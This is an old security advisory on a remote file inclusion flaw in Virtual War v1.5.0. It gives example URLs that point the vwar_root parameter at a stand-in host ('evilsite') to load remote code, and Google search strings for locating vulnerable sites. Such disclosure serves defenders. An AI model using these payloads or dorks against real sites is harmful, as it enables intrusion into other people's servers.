Virtual War File İnclusion

2006-04-09T00:00:00
ID SECURITYVULNS:DOC:12108
Type securityvulns
Reporter Securityvulns
Modified 2006-04-09T00:00:00

Description

Virtual War File İnclusion

Site:http://www.vwar.de/ Demo:http://www.vwar.de/demo/


File İnclusion

// get functions $vwar_root = "./";

require ($vwar_root . "includes/functions_common.php"); require ($vwar_root . "includes/functions_front.php");

Vwar_root parameter File inclusion

Aut File

war.php,stats.php,news.php,joinus.php,challenge.php,calendar.php,member.php,popup.php

and

all admin folder files


example

1)

http://victim.com/path/admin/admin.php?vwar_root=http://evilsite

2)(phpnuke module)

http://victim.com/path/modules/vwar/admin/admin.php?vwar_root=http://evilsite


Credit:Liz0ziM E-mail:liz0@bsdmail.com Site:www.biyo.tk www.biyosecurity.be


google:

"Powered by: Virtual War v1.5.0"

inurl:"modules.php?name=vwar"


Source: http://www.blogcu.com/Liz0ziM/431925/ http://liz0zim.no-ip.org/vwar.txt